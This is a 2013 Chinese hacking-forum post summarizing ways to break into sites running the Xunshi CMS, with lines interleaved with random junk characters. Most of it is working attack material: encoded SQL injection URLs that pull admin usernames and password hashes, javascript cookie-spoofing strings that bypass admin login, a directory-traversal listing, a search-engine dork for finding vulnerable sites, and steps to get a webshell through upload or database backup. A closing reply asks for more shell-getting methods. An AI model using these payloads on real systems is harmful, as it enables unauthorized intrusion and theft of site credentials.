找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2667|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
: k- w1 {+ L4 h& V9 c8 A6 l& ]# u$ W3 s) {) f% W( J3 X
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
8 I5 V/ O( x+ n+ j! ~& b
& w( T+ Y- ]4 t5 n以下本文总结来自黑防去年第9期杂志上的内容...1 m! v" {+ p; z& y) S' T0 E; X

! G7 R7 H$ k. L& n5 u先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
' o. V7 Q0 K/ O  }7 F4 e- t! Y
" i* R, x! o2 Y. F5 T: Z. v26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
9 Z* |/ s9 D( q3 F% L
  N4 }- ^$ k) m4 m; G2 s% ?1 m! d记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况9 N, [  ]8 I" r& \* X2 s4 s
这里一个注入3 i* h; B- A3 X; z, U1 m% d8 e

. O/ |& U' v* j( D6 T0 y, i效果如图:9 M& _) i& N7 w& o8 U0 k

6 g+ e) {5 U/ \* A* l # p6 X1 k$ M; E) a3 ~
$ J0 h- A2 ]# B' L5 b0 R1 T* }
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
! I6 S" D* Q" H* g
5 V. N% F0 Z2 \9 W" I6 W0 s密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
8 v* g, Y8 i6 f
5 U' Y# \) I% z& [- Xjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));5 N1 p- Q, F0 S2 `  G, ~6 A9 N
- g$ x" j0 w: k9 }; X( [, T6 k+ L
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:  [- O7 I( t& z

9 i' w) G% Z! V4 I1 N+ B, M因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞7 t) B# i- V6 L4 z

4 p( t7 G  t5 E5 ]! g它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以7 t* N, i( u- x) \  I. O
) e2 j! u2 i; W3 e1 p' l) B- J
访问这页面来列目录..步骤如下:
3 b/ d- P& P3 D, ~' b8 Q7 @/ o5 d% U+ ]
javascript:alert(document.cookie="admindj=1")
; ?( t4 D" `2 {
* M1 M2 p0 p5 F/ V* U# }http://www.political-security.co ... asp?id=46&dir=../..
, {5 k" `4 ~; m) w. g7 {* {- J3 G1 f' u& I% N% e
效果如图:# Y+ h9 g7 Q* ?5 ^' R$ H" J
  @% |6 R7 |. z3 I- D# [1 O& G4 z

7 A, @, e6 {+ n4 D
% h9 R4 ?; I. G5 e+ @! ^$ E- J: k这样全站目录都能瞧了..找到后台目录..进去..
" p5 e, y' c1 O  K3 z5 T5 \, ~7 g* e  d$ r! {  Y* ?# n
那么进了后台怎么拿shell??上传--备份就ok了..! N- ~7 O2 s" d9 Z  m# U0 B+ x$ H

7 G9 C( l& `" F! k* m: I( Z那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..  C2 w9 {, n3 o" Z/ t
4 K, ]6 X. r, G( s
这个我也碰到过一次..你都可以通过列目录来实现../ y: m* ^9 Q- `3 b
1 ?# Q; p5 o: [9 c& G
javascript:alert(document.cookie="admindj=1")
/ S1 t: o- D# c$ T4 v( T. \, `$ G4 ?& @; k- _
http://www.political-security.co ... p?action=BackupData 4 @5 F0 b* _9 H0 O; k
& r4 y8 x; R3 R# M. e
备份ok..
- `. ?5 j3 k5 V7 R; y2 j" j, m/ l
, p4 T* w' ]6 j& n9 j那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?8 @5 Q' P7 H) a0 R& [4 o' W
9 B/ A4 T! T. @4 }1 O' G4 m
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下$ g  Q% b3 ]2 E+ }  ~; ]+ A# E3 X9 m

- ~; ], t. G. R3 f然后访问此页面进行注入..步骤如下:
4 O/ \, p! l: v$ i" l
) W9 O9 e5 A/ ?' N7 d) yjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
, h9 A7 I' i6 m& e9 e& K/ h- c1 A( F" g$ k, M8 n6 o
然后请求admin/admin_chk.asp页面* _- v0 H/ ~: L/ K3 {

6 Q, J7 W' D1 E# j$ M输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%) A, o/ a: L, e4 T

1 u" D: H# ~0 T$ f- Z26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin! y; `3 [) {) D; x+ U0 M9 B3 S

- u& k) w- T8 o! A' o效果如图所示:7 s  b8 `5 y' y3 j

, b" h2 j  p/ a" e
1 b$ k/ k& r8 Z- C0 @6 V0 v
7 K" w+ x: {4 p; O/ _讯时漏洞21 ^' Z# m( Z# b4 J7 N
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
) F$ f* n6 }7 b5 g7 X ; A+ |# ~+ ]. g
1、/admin/admin_news_pl_view.asp?id=1  @1 E# C$ ^4 C
//id任意 填入以下语句# E) S4 V$ D1 F0 I

$ P. }4 C- t3 c8 K+ g1 s3 H2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!1 A/ G/ T( w( h3 \, g

3 {/ ]6 v8 o: v3 h2 l7 [3 L% X% p. g: t( C1 {; \& B; X" ?  n

3 D5 X) y& s2 X" D3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='$ S8 r* L. u7 z6 C$ @  M5 N
! R/ a! K' e' F7 l' r

, I: u% T# [+ K1 T4 L
. \: g) W( R) a0 x爆出管理员帐号和密码了9 S$ j* f- P% h' q* ?7 V) z0 r; y, E

" V" V0 k) j- J+ l' j2 o9 z/ h/ J" I* s, P% H2 ?" T/ C& A

+ t2 s* G6 J9 u) S0 N, m- u4、cookies进后台6 v5 S+ \/ ^# N4 j8 e! U- Q
0 y  V7 f- c. _( g% T
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
' Z/ F7 o! Z7 P$ v. n 3 a) X$ \$ v) H8 f+ |, g  Q
  J4 B+ A0 a6 C7 F" @
2 n2 p9 W, Q* H9 T* B
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
7 d7 K( p' a0 b3 j
8 {% Z1 @! _# r1 T1 A. }$ u( Z3 U- b/ `* V0 c+ G+ r; s
  \% \; E! B$ Z
6、后台有上传和备份取SHELL不难。
# Q4 b5 ?+ I0 n4 y" | 3 T$ @3 y0 d0 ?9 u' l7 g& |* V
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..2 O  g3 q5 ^* n: C2 q, i: r

+ k0 O, I! M* o3 M  x; S4 c6 u逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
- @, I) }: y; ^6 k' w) h* \% r( c
0 J  f5 C/ k; s3 y  K: _
7 A. n3 {% f  @9 `# R/ b
1 Z# s. U4 v, C- F+ m: W' K2 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表